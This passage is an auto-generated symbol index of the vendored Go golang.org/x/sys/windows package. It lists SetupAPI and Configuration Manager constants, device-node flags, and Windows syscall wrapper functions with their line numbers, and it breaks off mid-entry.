0x00000009 constant SPDRP_CONFIGFLAGS (line 649) | SPDRP_CONFIGFLAGS SPDRP = 0x0000000A constant SPDRP_MFG (line 650) | SPDRP_MFG SPDRP = 0x0000000B constant SPDRP_FRIENDLYNAME (line 651) | SPDRP_FRIENDLYNAME SPDRP = 0x0000000C constant SPDRP_LOCATION_INFORMATION (line 652) | SPDRP_LOCATION_INFORMATION SPDRP = 0x0000000D constant SPDRP_PHYSICAL_DEVICE_OBJECT_NAME (line 653) | SPDRP_PHYSICAL_DEVICE_OBJECT_NAME SPDRP = 0x0000000E constant SPDRP_CAPABILITIES (line 654) | SPDRP_CAPABILITIES SPDRP = 0x0000000F constant SPDRP_UI_NUMBER (line 655) | SPDRP_UI_NUMBER SPDRP = 0x00000010 constant SPDRP_UPPERFILTERS (line 656) | SPDRP_UPPERFILTERS SPDRP = 0x00000011 constant SPDRP_LOWERFILTERS (line 657) | SPDRP_LOWERFILTERS SPDRP = 0x00000012 constant SPDRP_BUSTYPEGUID (line 658) | SPDRP_BUSTYPEGUID SPDRP = 0x00000013 constant SPDRP_LEGACYBUSTYPE (line 659) | SPDRP_LEGACYBUSTYPE SPDRP = 0x00000014 constant SPDRP_BUSNUMBER (line 660) | SPDRP_BUSNUMBER SPDRP = 0x00000015 constant SPDRP_ENUMERATOR_NAME (line 661) | SPDRP_ENUMERATOR_NAME SPDRP = 0x00000016 constant SPDRP_SECURITY (line 662) | SPDRP_SECURITY SPDRP = 0x00000017 constant SPDRP_SECURITY_SDS (line 663) | SPDRP_SECURITY_SDS SPDRP = 0x00000018 constant SPDRP_DEVTYPE (line 664) | SPDRP_DEVTYPE SPDRP = 0x00000019 constant SPDRP_EXCLUSIVE (line 665) | SPDRP_EXCLUSIVE SPDRP = 0x0000001A constant SPDRP_CHARACTERISTICS (line 666) | SPDRP_CHARACTERISTICS SPDRP = 0x0000001B constant SPDRP_ADDRESS (line 667) | SPDRP_ADDRESS SPDRP = 0x0000001C constant SPDRP_UI_NUMBER_DESC_FORMAT (line 668) | SPDRP_UI_NUMBER_DESC_FORMAT SPDRP = 0x0000001D constant SPDRP_DEVICE_POWER_DATA (line 669) | SPDRP_DEVICE_POWER_DATA SPDRP = 0x0000001E constant SPDRP_REMOVAL_POLICY (line 670) | SPDRP_REMOVAL_POLICY SPDRP = 0x0000001F constant SPDRP_REMOVAL_POLICY_HW_DEFAULT (line 671) | SPDRP_REMOVAL_POLICY_HW_DEFAULT SPDRP = 0x00000020 constant SPDRP_REMOVAL_POLICY_OVERRIDE (line 672) | SPDRP_REMOVAL_POLICY_OVERRIDE SPDRP = 0x00000021 constant SPDRP_INSTALL_STATE (line 673) | SPDRP_INSTALL_STATE SPDRP = 0x00000022 constant SPDRP_LOCATION_PATHS (line 674) | SPDRP_LOCATION_PATHS SPDRP = 0x00000023 constant SPDRP_BASE_CONTAINERID (line 675) | SPDRP_BASE_CONTAINERID SPDRP = 0x00000024 constant SPDRP_MAXIMUM_PROPERTY (line 677) | SPDRP_MAXIMUM_PROPERTY SPDRP = 0x00000025 type DEVPROPTYPE (line 682) | type DEVPROPTYPE constant DEVPROP_TYPEMOD_ARRAY (line 685) | DEVPROP_TYPEMOD_ARRAY DEVPROPTYPE = 0x00001000 constant DEVPROP_TYPEMOD_LIST (line 686) | DEVPROP_TYPEMOD_LIST DEVPROPTYPE = 0x00002000 constant DEVPROP_TYPE_EMPTY (line 688) | DEVPROP_TYPE_EMPTY DEVPROPTYPE = 0x00000000 constant DEVPROP_TYPE_NULL (line 689) | DEVPROP_TYPE_NULL DEVPROPTYPE = 0x00000001 constant DEVPROP_TYPE_SBYTE (line 690) | DEVPROP_TYPE_SBYTE DEVPROPTYPE = 0x00000002 constant DEVPROP_TYPE_BYTE (line 691) | DEVPROP_TYPE_BYTE DEVPROPTYPE = 0x00000003 constant DEVPROP_TYPE_INT16 (line 692) | DEVPROP_TYPE_INT16 DEVPROPTYPE = 0x00000004 constant DEVPROP_TYPE_UINT16 (line 693) | DEVPROP_TYPE_UINT16 DEVPROPTYPE = 0x00000005 constant DEVPROP_TYPE_INT32 (line 694) | DEVPROP_TYPE_INT32 DEVPROPTYPE = 0x00000006 constant DEVPROP_TYPE_UINT32 (line 695) | DEVPROP_TYPE_UINT32 DEVPROPTYPE = 0x00000007 constant DEVPROP_TYPE_INT64 (line 696) | DEVPROP_TYPE_INT64 DEVPROPTYPE = 0x00000008 constant DEVPROP_TYPE_UINT64 (line 697) | DEVPROP_TYPE_UINT64 DEVPROPTYPE = 0x00000009 constant DEVPROP_TYPE_FLOAT (line 698) | DEVPROP_TYPE_FLOAT DEVPROPTYPE = 0x0000000A constant DEVPROP_TYPE_DOUBLE (line 699) | DEVPROP_TYPE_DOUBLE DEVPROPTYPE = 0x0000000B constant DEVPROP_TYPE_DECIMAL (line 700) | DEVPROP_TYPE_DECIMAL DEVPROPTYPE = 0x0000000C constant DEVPROP_TYPE_GUID (line 701) | DEVPROP_TYPE_GUID DEVPROPTYPE = 0x0000000D constant DEVPROP_TYPE_CURRENCY (line 702) | DEVPROP_TYPE_CURRENCY DEVPROPTYPE = 0x0000000E constant DEVPROP_TYPE_DATE (line 703) | DEVPROP_TYPE_DATE DEVPROPTYPE = 0x0000000F constant DEVPROP_TYPE_FILETIME (line 704) | DEVPROP_TYPE_FILETIME DEVPROPTYPE = 0x00000010 constant DEVPROP_TYPE_BOOLEAN (line 705) | DEVPROP_TYPE_BOOLEAN DEVPROPTYPE = 0x00000011 constant DEVPROP_TYPE_STRING (line 706) | DEVPROP_TYPE_STRING DEVPROPTYPE = 0x00000012 constant DEVPROP_TYPE_STRING_LIST (line 707) | DEVPROP_TYPE_STRING_LIST DEVPROPTYPE = DEVPROP_TYPE_STRIN... constant DEVPROP_TYPE_SECURITY_DESCRIPTOR (line 708) | DEVPROP_TYPE_SECURITY_DESCRIPTOR DEVPROPTYPE = 0x00000013 constant DEVPROP_TYPE_SECURITY_DESCRIPTOR_STRING (line 709) | DEVPROP_TYPE_SECURITY_DESCRIPTOR_STRING DEVPROPTYPE = 0x00000014 constant DEVPROP_TYPE_DEVPROPKEY (line 710) | DEVPROP_TYPE_DEVPROPKEY DEVPROPTYPE = 0x00000015 constant DEVPROP_TYPE_DEVPROPTYPE (line 711) | DEVPROP_TYPE_DEVPROPTYPE DEVPROPTYPE = 0x00000016 constant DEVPROP_TYPE_BINARY (line 712) | DEVPROP_TYPE_BINARY DEVPROPTYPE = DEVPROP_TYPE_BYTE ... constant DEVPROP_TYPE_ERROR (line 713) | DEVPROP_TYPE_ERROR DEVPROPTYPE = 0x00000017 constant DEVPROP_TYPE_NTSTATUS (line 714) | DEVPROP_TYPE_NTSTATUS DEVPROPTYPE = 0x00000018 constant DEVPROP_TYPE_STRING_INDIRECT (line 715) | DEVPROP_TYPE_STRING_INDIRECT DEVPROPTYPE = 0x00000019 constant MAX_DEVPROP_TYPE (line 717) | MAX_DEVPROP_TYPE DEVPROPTYPE = 0x00000019 constant MAX_DEVPROP_TYPEMOD (line 718) | MAX_DEVPROP_TYPEMOD DEVPROPTYPE = 0x00002000 constant DEVPROP_MASK_TYPE (line 720) | DEVPROP_MASK_TYPE DEVPROPTYPE = 0x00000FFF constant DEVPROP_MASK_TYPEMOD (line 721) | DEVPROP_MASK_TYPEMOD DEVPROPTYPE = 0x0000F000 type DEVPROPGUID (line 725) | type DEVPROPGUID type DEVPROPID (line 728) | type DEVPROPID constant DEVPROPID_FIRST_USABLE (line 730) | DEVPROPID_FIRST_USABLE DEVPROPID = 2 type DEVPROPKEY (line 734) | type DEVPROPKEY struct type CONFIGRET (line 740) | type CONFIGRET method Error (line 742) | func (ret CONFIGRET) Error() string { method Win32Error (line 749) | func (ret CONFIGRET) Win32Error(defaultError Errno) Errno { method Unwrap (line 753) | func (ret CONFIGRET) Unwrap() error { constant CR_SUCCESS (line 763) | CR_SUCCESS CONFIGRET = 0x00000000 constant CR_DEFAULT (line 764) | CR_DEFAULT CONFIGRET = 0x00000001 constant CR_OUT_OF_MEMORY (line 765) | CR_OUT_OF_MEMORY CONFIGRET = 0x00000002 constant CR_INVALID_POINTER (line 766) | CR_INVALID_POINTER CONFIGRET = 0x00000003 constant CR_INVALID_FLAG (line 767) | CR_INVALID_FLAG CONFIGRET = 0x00000004 constant CR_INVALID_DEVNODE (line 768) | CR_INVALID_DEVNODE CONFIGRET = 0x00000005 constant CR_INVALID_DEVINST (line 769) | CR_INVALID_DEVINST = CR_INVALID_DEVNODE constant CR_INVALID_RES_DES (line 770) | CR_INVALID_RES_DES CONFIGRET = 0x00000006 constant CR_INVALID_LOG_CONF (line 771) | CR_INVALID_LOG_CONF CONFIGRET = 0x00000007 constant CR_INVALID_ARBITRATOR (line 772) | CR_INVALID_ARBITRATOR CONFIGRET = 0x00000008 constant CR_INVALID_NODELIST (line 773) | CR_INVALID_NODELIST CONFIGRET = 0x00000009 constant CR_DEVNODE_HAS_REQS (line 774) | CR_DEVNODE_HAS_REQS CONFIGRET = 0x0000000A constant CR_DEVINST_HAS_REQS (line 775) | CR_DEVINST_HAS_REQS = CR_DEVNODE_HAS_REQS constant CR_INVALID_RESOURCEID (line 776) | CR_INVALID_RESOURCEID CONFIGRET = 0x0000000B constant CR_DLVXD_NOT_FOUND (line 777) | CR_DLVXD_NOT_FOUND CONFIGRET = 0x0000000C constant CR_NO_SUCH_DEVNODE (line 778) | CR_NO_SUCH_DEVNODE CONFIGRET = 0x0000000D constant CR_NO_SUCH_DEVINST (line 779) | CR_NO_SUCH_DEVINST = CR_NO_SUCH_DEVNODE constant CR_NO_MORE_LOG_CONF (line 780) | CR_NO_MORE_LOG_CONF CONFIGRET = 0x0000000E constant CR_NO_MORE_RES_DES (line 781) | CR_NO_MORE_RES_DES CONFIGRET = 0x0000000F constant CR_ALREADY_SUCH_DEVNODE (line 782) | CR_ALREADY_SUCH_DEVNODE CONFIGRET = 0x00000010 constant CR_ALREADY_SUCH_DEVINST (line 783) | CR_ALREADY_SUCH_DEVINST = CR_ALREADY_SUCH_DEVNODE constant CR_INVALID_RANGE_LIST (line 784) | CR_INVALID_RANGE_LIST CONFIGRET = 0x00000011 constant CR_INVALID_RANGE (line 785) | CR_INVALID_RANGE CONFIGRET = 0x00000012 constant CR_FAILURE (line 786) | CR_FAILURE CONFIGRET = 0x00000013 constant CR_NO_SUCH_LOGICAL_DEV (line 787) | CR_NO_SUCH_LOGICAL_DEV CONFIGRET = 0x00000014 constant CR_CREATE_BLOCKED (line 788) | CR_CREATE_BLOCKED CONFIGRET = 0x00000015 constant CR_NOT_SYSTEM_VM (line 789) | CR_NOT_SYSTEM_VM CONFIGRET = 0x00000016 constant CR_REMOVE_VETOED (line 790) | CR_REMOVE_VETOED CONFIGRET = 0x00000017 constant CR_APM_VETOED (line 791) | CR_APM_VETOED CONFIGRET = 0x00000018 constant CR_INVALID_LOAD_TYPE (line 792) | CR_INVALID_LOAD_TYPE CONFIGRET = 0x00000019 constant CR_BUFFER_SMALL (line 793) | CR_BUFFER_SMALL CONFIGRET = 0x0000001A constant CR_NO_ARBITRATOR (line 794) | CR_NO_ARBITRATOR CONFIGRET = 0x0000001B constant CR_NO_REGISTRY_HANDLE (line 795) | CR_NO_REGISTRY_HANDLE CONFIGRET = 0x0000001C constant CR_REGISTRY_ERROR (line 796) | CR_REGISTRY_ERROR CONFIGRET = 0x0000001D constant CR_INVALID_DEVICE_ID (line 797) | CR_INVALID_DEVICE_ID CONFIGRET = 0x0000001E constant CR_INVALID_DATA (line 798) | CR_INVALID_DATA CONFIGRET = 0x0000001F constant CR_INVALID_API (line 799) | CR_INVALID_API CONFIGRET = 0x00000020 constant CR_DEVLOADER_NOT_READY (line 800) | CR_DEVLOADER_NOT_READY CONFIGRET = 0x00000021 constant CR_NEED_RESTART (line 801) | CR_NEED_RESTART CONFIGRET = 0x00000022 constant CR_NO_MORE_HW_PROFILES (line 802) | CR_NO_MORE_HW_PROFILES CONFIGRET = 0x00000023 constant CR_DEVICE_NOT_THERE (line 803) | CR_DEVICE_NOT_THERE CONFIGRET = 0x00000024 constant CR_NO_SUCH_VALUE (line 804) | CR_NO_SUCH_VALUE CONFIGRET = 0x00000025 constant CR_WRONG_TYPE (line 805) | CR_WRONG_TYPE CONFIGRET = 0x00000026 constant CR_INVALID_PRIORITY (line 806) | CR_INVALID_PRIORITY CONFIGRET = 0x00000027 constant CR_NOT_DISABLEABLE (line 807) | CR_NOT_DISABLEABLE CONFIGRET = 0x00000028 constant CR_FREE_RESOURCES (line 808) | CR_FREE_RESOURCES CONFIGRET = 0x00000029 constant CR_QUERY_VETOED (line 809) | CR_QUERY_VETOED CONFIGRET = 0x0000002A constant CR_CANT_SHARE_IRQ (line 810) | CR_CANT_SHARE_IRQ CONFIGRET = 0x0000002B constant CR_NO_DEPENDENT (line 811) | CR_NO_DEPENDENT CONFIGRET = 0x0000002C constant CR_SAME_RESOURCES (line 812) | CR_SAME_RESOURCES CONFIGRET = 0x0000002D constant CR_NO_SUCH_REGISTRY_KEY (line 813) | CR_NO_SUCH_REGISTRY_KEY CONFIGRET = 0x0000002E constant CR_INVALID_MACHINENAME (line 814) | CR_INVALID_MACHINENAME CONFIGRET = 0x0000002F constant CR_REMOTE_COMM_FAILURE (line 815) | CR_REMOTE_COMM_FAILURE CONFIGRET = 0x00000030 constant CR_MACHINE_UNAVAILABLE (line 816) | CR_MACHINE_UNAVAILABLE CONFIGRET = 0x00000031 constant CR_NO_CM_SERVICES (line 817) | CR_NO_CM_SERVICES CONFIGRET = 0x00000032 constant CR_ACCESS_DENIED (line 818) | CR_ACCESS_DENIED CONFIGRET = 0x00000033 constant CR_CALL_NOT_IMPLEMENTED (line 819) | CR_CALL_NOT_IMPLEMENTED CONFIGRET = 0x00000034 constant CR_INVALID_PROPERTY (line 820) | CR_INVALID_PROPERTY CONFIGRET = 0x00000035 constant CR_DEVICE_INTERFACE_ACTIVE (line 821) | CR_DEVICE_INTERFACE_ACTIVE CONFIGRET = 0x00000036 constant CR_NO_SUCH_DEVICE_INTERFACE (line 822) | CR_NO_SUCH_DEVICE_INTERFACE CONFIGRET = 0x00000037 constant CR_INVALID_REFERENCE_STRING (line 823) | CR_INVALID_REFERENCE_STRING CONFIGRET = 0x00000038 constant CR_INVALID_CONFLICT_LIST (line 824) | CR_INVALID_CONFLICT_LIST CONFIGRET = 0x00000039 constant CR_INVALID_INDEX (line 825) | CR_INVALID_INDEX CONFIGRET = 0x0000003A constant CR_INVALID_STRUCTURE_SIZE (line 826) | CR_INVALID_STRUCTURE_SIZE CONFIGRET = 0x0000003B constant NUM_CR_RESULTS (line 827) | NUM_CR_RESULTS CONFIGRET = 0x0000003C constant CM_GET_DEVICE_INTERFACE_LIST_PRESENT (line 831) | CM_GET_DEVICE_INTERFACE_LIST_PRESENT = 0 constant CM_GET_DEVICE_INTERFACE_LIST_ALL_DEVICES (line 832) | CM_GET_DEVICE_INTERFACE_LIST_ALL_DEVICES = 1 constant DN_ROOT_ENUMERATED (line 836) | DN_ROOT_ENUMERATED = 0x00000001 constant DN_DRIVER_LOADED (line 837) | DN_DRIVER_LOADED = 0x00000002 constant DN_ENUM_LOADED (line 838) | DN_ENUM_LOADED = 0x00000004 constant DN_STARTED (line 839) | DN_STARTED = 0x00000008 constant DN_MANUAL (line 840) | DN_MANUAL = 0x00000010 constant DN_NEED_TO_ENUM (line 841) | DN_NEED_TO_ENUM = 0x00000020 constant DN_NOT_FIRST_TIME (line 842) | DN_NOT_FIRST_TIME = 0x00000040 constant DN_HARDWARE_ENUM (line 843) | DN_HARDWARE_ENUM = 0x00000080 constant DN_LIAR (line 844) | DN_LIAR = 0x00000100 constant DN_HAS_MARK (line 845) | DN_HAS_MARK = 0x00000200 constant DN_HAS_PROBLEM (line 846) | DN_HAS_PROBLEM = 0x00000400 constant DN_FILTERED (line 847) | DN_FILTERED = 0x00000800 constant DN_MOVED (line 848) | DN_MOVED = 0x00001000 constant DN_DISABLEABLE (line 849) | DN_DISABLEABLE = 0x00002000 constant DN_REMOVABLE (line 850) | DN_REMOVABLE = 0x00004000 constant DN_PRIVATE_PROBLEM (line 851) | DN_PRIVATE_PROBLEM = 0x00008000 constant DN_MF_PARENT (line 852) | DN_MF_PARENT = 0x00010000 constant DN_MF_CHILD (line 853) | DN_MF_CHILD = 0x00020000 constant DN_WILL_BE_REMOVED (line 854) | DN_WILL_BE_REMOVED = 0x00040000 constant DN_NOT_FIRST_TIMEE (line 855) | DN_NOT_FIRST_TIMEE = 0x00080000 constant DN_STOP_FREE_RES (line 856) | DN_STOP_FREE_RES = 0x00100000 constant DN_REBAL_CANDIDATE (line 857) | DN_REBAL_CANDIDATE = 0x00200000 constant DN_BAD_PARTIAL (line 858) | DN_BAD_PARTIAL = 0x00400000 constant DN_NT_ENUMERATOR (line 859) | DN_NT_ENUMERATOR = 0x00800000 constant DN_NT_DRIVER (line 860) | DN_NT_DRIVER = 0x01000000 constant DN_NEEDS_LOCKING (line 861) | DN_NEEDS_LOCKING = 0x02000000 constant DN_ARM_WAKEUP (line 862) | DN_ARM_WAKEUP = 0x04000000 constant DN_APM_ENUMERATOR (line 863) | DN_APM_ENUMERATOR = 0x08000000 constant DN_APM_DRIVER (line 864) | DN_APM_DRIVER = 0x10000000 constant DN_SILENT_INSTALL (line 865) | DN_SILENT_INSTALL = 0x20000000 constant DN_NO_SHOW_IN_DM (line 866) | DN_NO_SHOW_IN_DM = 0x40000000 constant DN_BOOT_LOG_PROB (line 867) | DN_BOOT_LOG_PROB = 0x80000000 constant DN_NEED_RESTART (line 868) | DN_NEED_RESTART = DN_LIAR constant DN_DRIVER_BLOCKED (line 869) | DN_DRIVER_BLOCKED = DN_NOT_FIRST_TIME constant DN_LEGACY_DRIVER (line 870) | DN_LEGACY_DRIVER = DN_MOVED constant DN_CHILD_WITH_INVALID_ID (line 871) | DN_CHILD_WITH_INVALID_ID = DN_HAS_MARK constant DN_DEVICE_DISCONNECTED (line 872) | DN_DEVICE_DISCONNECTED = DN_NEEDS_LOCKING constant DN_QUERY_REMOVE_PENDING (line 873) | DN_QUERY_REMOVE_PENDING = DN_MF_PARENT constant DN_QUERY_REMOVE_ACTIVE (line 874) | DN_QUERY_REMOVE_ACTIVE = DN_MF_CHILD constant DN_CHANGEABLE_FLAGS (line 875) | DN_CHANGEABLE_FLAGS = DN_NOT_FIRST_TIME | DN_HARDWARE_ENUM | DN_HAS... function SetupDiCreateDeviceInfoListEx (line 881) | func SetupDiCreateDeviceInfoListEx(classGUID *GUID, hwndParent uintptr, ... function SetupDiGetDeviceInfoListDetail (line 895) | func SetupDiGetDeviceInfoListDetail(deviceInfoSet DevInfo) (deviceInfoSe... function SetupDiCreateDeviceInfo (line 910) | func SetupDiCreateDeviceInfo(deviceInfoSet DevInfo, deviceName string, c... function SetupDiEnumDeviceInfo (line 938) | func SetupDiEnumDeviceInfo(deviceInfoSet DevInfo, memberIndex int) (*Dev... function SetupDiEnumDriverInfo (line 975) | func SetupDiEnumDriverInfo(deviceInfoSet DevInfo, deviceInfoData *DevInf... function SetupDiGetSelectedDriver (line 990) | func SetupDiGetSelectedDriver(deviceInfoSet DevInfo, deviceInfoData *Dev... function SetupDiGetDriverInfoDetail (line 1012) | func SetupDiGetDriverInfoDetail(deviceInfoSet DevInfo, deviceInfoData *D... function SetupDiGetClassDevsEx (line 1045) | func SetupDiGetClassDevsEx(classGUID *GUID, enumerator string, hwndParen... function SetupDiGetDeviceProperty (line 1082) | func SetupDiGetDeviceProperty(deviceInfoSet DevInfo, deviceInfoData *Dev... function SetupDiGetDeviceRegistryProperty (line 1107) | func SetupDiGetDeviceRegistryProperty(deviceInfoSet DevInfo, deviceInfoD... function getRegistryValue (line 1123) | func getRegistryValue(buf []byte, dataType uint32) (interface{}, error) { function bufToUTF16 (line 1175) | func bufToUTF16(buf []byte) []uint16 { function utf16ToBuf (line 1185) | func utf16ToBuf(buf []uint16) []byte { function wcslen (line 1194) | func wcslen(str []uint16) int { function SetupDiSetDeviceRegistryProperty (line 1211) | func SetupDiSetDeviceRegistryProperty(deviceInfoSet DevInfo, deviceInfoD... function SetupDiGetDeviceInstallParams (line 1234) | func SetupDiGetDeviceInstallParams(deviceInfoSet DevInfo, deviceInfoData... function SetupDiGetDeviceInstanceId (line 1249) | func SetupDiGetDeviceInstanceId(deviceInfoSet DevInfo, deviceInfoData *D... function SetupDiClassNameFromGuidEx (line 1295) | func SetupDiClassNameFromGuidEx(classGUID *GUID, machineName string) (cl... function SetupDiClassGuidsFromNameEx (line 1318) | func SetupDiClassGuidsFromNameEx(className string, machineName string) (... function SetupDiGetSelectedDevice (line 1349) | func SetupDiGetSelectedDevice(deviceInfoSet DevInfo) (*DevInfoData, erro... function SetupUninstallOEMInf (line 1372) | func SetupUninstallOEMInf(infFileName string, flags SUOI) error { function CM_Get_Device_Interface_List (line 1385) | func CM_Get_Device_Interface_List(deviceID string, interfaceClass *GUID,... function CM_Get_DevNode_Status (line 1419) | func CM_Get_DevNode_Status(status *uint32, problemNumber *uint32, devIns... FILE: vendor/golang.org/x/sys/windows/str.go function itoa (line 9) | func itoa(val int) string { // do it here rather than with fmt to avoid ... FILE: vendor/golang.org/x/sys/windows/syscall.go function ByteSliceFromString (line 37) | func ByteSliceFromString(s string) ([]byte, error) { function BytePtrFromString (line 49) | func BytePtrFromString(s string) (*byte, error) { function ByteSliceToString (line 59) | func ByteSliceToString(s []byte) string { function BytePtrToString (line 69) | func BytePtrToString(p *byte) string { method Unix (line 90) | func (ts *Timespec) Unix() (sec int64, nsec int64) { method Unix (line 94) | func (tv *Timeval) Unix() (sec int64, nsec int64) { method Nano (line 98) | func (ts *Timespec) Nano() int64 { method Nano (line 102) | func (tv *Timeval) Nano() int64 { FILE: vendor/golang.org/x/sys/windows/syscall_windows.go type Handle (line 20) | type Handle type HWND (line 21) | type HWND constant InvalidHandle (line 24) | InvalidHandle = ^Handle(0) constant InvalidHWND (line 25) | InvalidHWND = ^HWND(0) constant DDD_EXACT_MATCH_ON_REMOVE (line 28) | DDD_EXACT_MATCH_ON_REMOVE = 0x00000004 constant DDD_NO_BROADCAST_SYSTEM (line 29) | DDD_NO_BROADCAST_SYSTEM = 0x00000008 constant DDD_RAW_TARGET_PATH (line 30) | DDD_RAW_TARGET_PATH = 0x00000001 constant DDD_REMOVE_DEFINITION (line 31) | DDD_REMOVE_DEFINITION = 0x00000002 constant DRIVE_UNKNOWN (line 34) | DRIVE_UNKNOWN = 0 constant DRIVE_NO_ROOT_DIR (line 35) | DRIVE_NO_ROOT_DIR = 1 constant DRIVE_REMOVABLE (line 36) | DRIVE_REMOVABLE = 2 constant DRIVE_FIXED (line 37) | DRIVE_FIXED = 3 constant DRIVE_REMOTE (line 38) | DRIVE_REMOTE = 4 constant DRIVE_CDROM (line 39) | DRIVE_CDROM = 5 constant DRIVE_RAMDISK (line 40) | DRIVE_RAMDISK = 6 constant FILE_CASE_SENSITIVE_SEARCH (line 43) | FILE_CASE_SENSITIVE_SEARCH = 0x00000001 constant FILE_CASE_PRESERVED_NAMES (line 44) | FILE_CASE_PRESERVED_NAMES = 0x00000002 constant FILE_FILE_COMPRESSION (line 45) | FILE_FILE_COMPRESSION = 0x00000010 constant FILE_DAX_VOLUME (line 46) | FILE_DAX_VOLUME = 0x20000000 constant FILE_NAMED_STREAMS (line 47) | FILE_NAMED_STREAMS = 0x00040000 constant FILE_PERSISTENT_ACLS (line 48) | FILE_PERSISTENT_ACLS = 0x00000008 constant FILE_READ_ONLY_VOLUME (line 49) | FILE_READ_ONLY_VOLUME = 0x00080000 constant FILE_SEQUENTIAL_WRITE_ONCE (line 50) | FILE_SEQUENTIAL_WRITE_ONCE = 0x00100000 constant FILE_SUPPORTS_ENCRYPTION (line 51) | FILE_SUPPORTS_ENCRYPTION = 0x00020000 constant FILE_SUPPORTS_EXTENDED_ATTRIBUTES (line 52) | FILE_SUPPORTS_EXTENDED_ATTRIBUTES = 0x00800000 constant FILE_SUPPORTS_HARD_LINKS (line 53) | FILE_SUPPORTS_HARD_LINKS = 0x00400000 constant FILE_SUPPORTS_OBJECT_IDS (line 54) | FILE_SUPPORTS_OBJECT_IDS = 0x00010000 constant FILE_SUPPORTS_OPEN_BY_FILE_ID (line 55) | FILE_SUPPORTS_OPEN_BY_FILE_ID = 0x01000000 constant FILE_SUPPORTS_REPARSE_POINTS (line 56) | FILE_SUPPORTS_REPARSE_POINTS = 0x00000080 constant FILE_SUPPORTS_SPARSE_FILES (line 57) | FILE_SUPPORTS_SPARSE_FILES = 0x00000040 constant FILE_SUPPORTS_TRANSACTIONS (line 58) | FILE_SUPPORTS_TRANSACTIONS = 0x00200000 constant FILE_SUPPORTS_USN_JOURNAL (line 59) | FILE_SUPPORTS_USN_JOURNAL = 0x02000000 constant FILE_UNICODE_ON_DISK (line 60) | FILE_UNICODE_ON_DISK = 0x00000004 constant FILE_VOLUME_IS_COMPRESSED (line 61) | FILE_VOLUME_IS_COMPRESSED = 0x00008000 constant FILE_VOLUME_QUOTAS (line 62) | FILE_VOLUME_QUOTAS = 0x00000020 constant LOCKFILE_FAIL_IMMEDIATELY (line 65) | LOCKFILE_FAIL_IMMEDIATELY = 0x00000001 constant LOCKFILE_EXCLUSIVE_LOCK (line 66) | LOCKFILE_EXCLUSIVE_LOCK = 0x00000002 constant WAIT_IO_COMPLETION (line 69) | WAIT_IO_COMPLETION = 0x000000C0 function StringToUTF16 (line 75) | func StringToUTF16(s string) []uint16 { function UTF16FromString (line 86) | func UTF16FromString(s string) ([]uint16, error) { function UTF16ToString (line 92) | func UTF16ToString(s []uint16) string { function StringToUTF16Ptr (line 99) | func StringToUTF16Ptr(s string) *uint16 { return &StringToUTF16(s)[0] } function UTF16PtrFromString (line 104) | func UTF16PtrFromString(s string) (*uint16, error) { function UTF16PtrToString (line 115) | func UTF16PtrToString(p *uint16) string { function Getpagesize (line 131) | func Getpagesize() int { return 4096 } function NewCallback (line 136) | func NewCallback(fn interface{}) uintptr { function NewCallbackCDecl (line 143) | func NewCallbackCDecl(fn interface{}) uintptr { function GetCurrentProcess (line 456) | func GetCurrentProcess() (Handle, error) { function CurrentProcess (line 462) | func CurrentProcess() Handle { return Handle(^uintptr(1 - 1)) } function GetCurrentThread (line 470) | func GetCurrentThread() (Handle, error) { function CurrentThread (line 476) | func CurrentThread() Handle { return Handle(^uintptr(2 - 1)) } function GetProcAddressByOrdinal (line 480) | func GetProcAddressByOrdinal(module Handle, ordinal uintptr) (proc uintp... function Exit (line 489) | func Exit(code int) { ExitProcess(uint32(code)) } function makeInheritSa (line 491) | func makeInheritSa() *SecurityAttributes { function Open (line 498) | func Open(path string, mode int, perm uint32) (fd Handle, err error) { function Read (line 548) | func Read(fd Handle, p []byte) (n int, err error) { function Write (line 561) | func Write(fd Handle, p []byte) (n int, err error) { function ReadFile (line 573) | func ReadFile(fd Handle, p []byte, done *uint32, overlapped *Overlapped)... function WriteFile (line 584) | func WriteFile(fd Handle, p []byte, done *uint32, overlapped *Overlapped... function Seek (line 597) | func Seek(fd Handle, offset int64, whence int) (newoffset int64, err err... function Close (line 621) | func Close(fd Handle) (err error) { function getStdHandle (line 631) | func getStdHandle(stdhandle uint32) (fd Handle) { constant ImplementsGetwd (line 636) | ImplementsGetwd = true function Getwd (line 638) | func Getwd() (wd string, err error) { function Chdir (line 647) | func Chdir(path string) (err error) { function Mkdir (line 655) | func Mkdir(path string, mode uint32) (err error) { function Rmdir (line 663) | func Rmdir(path string) (err error) { function Unlink (line 671) | func Unlink(path string) (err error) { function Rename (line 679) | func Rename(oldpath, newpath string) (err error) { function ComputerName (line 691) | func ComputerName() (name string, err error) { function DurationSinceBoot (line 701) | func DurationSinceBoot() time.Duration { function Ftruncate (line 705) | func Ftruncate(fd Handle, length int64) (err error) { function Gettimeofday (line 722) | func Gettimeofday(tv *Timeval) (err error) { function Pipe (line 729) | func Pipe(p []Handle) (err error) { function Utimes (line 743) | func Utimes(path string, tv []Timeval) (err error) { function UtimesNano (line 763) | func UtimesNano(path string, ts []Timespec) (err error) { function Fsync (line 783) | func Fsync(fd Handle) (err error) { function Chmod (line 787) | func Chmod(path string, mode uint32) (err error) { function LoadGetSystemTimePreciseAsFileTime (line 804) | func LoadGetSystemTimePreciseAsFileTime() error { function LoadCancelIoEx (line 808) | func LoadCancelIoEx() error { function LoadSetFileCompletionNotificationModes (line 812) | func LoadSetFileCompletionNotificationModes() error { function WaitForMultipleObjects (line 816) | func WaitForMultipleObjects(handles []Handle, waitAll bool, waitMillisec... constant socket_error (line 830) | socket_error = uintptr(^uint32(0)) type RawSockaddrInet4 (line 880) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 887) | type RawSockaddrInet6 struct type RawSockaddr (line 895) | type RawSockaddr struct type RawSockaddrAny (line 900) | type RawSockaddrAny struct method Sockaddr (line 1011) | func (rsa *RawSockaddrAny) Sockaddr() (Sockaddr, error) { type Sockaddr (line 905) | type Sockaddr interface type SockaddrInet4 (line 909) | type SockaddrInet4 struct method sockaddr (line 915) | func (sa *SockaddrInet4) sockaddr() (unsafe.Pointer, int32, error) { type SockaddrInet6 (line 927) | type SockaddrInet6 struct method sockaddr (line 934) | func (sa *SockaddrInet6) sockaddr() (unsafe.Pointer, int32, error) { type RawSockaddrUnix (line 947) | type RawSockaddrUnix struct type SockaddrUnix (line 952) | type SockaddrUnix struct method sockaddr (line 957) | func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, int32, error) { type RawSockaddrBth (line 985) | type RawSockaddrBth struct type SockaddrBth (line 992) | type SockaddrBth struct method sockaddr (line 1000) | func (sa *SockaddrBth) sockaddr() (unsafe.Pointer, int32, error) { function Socket (line 1057) | func 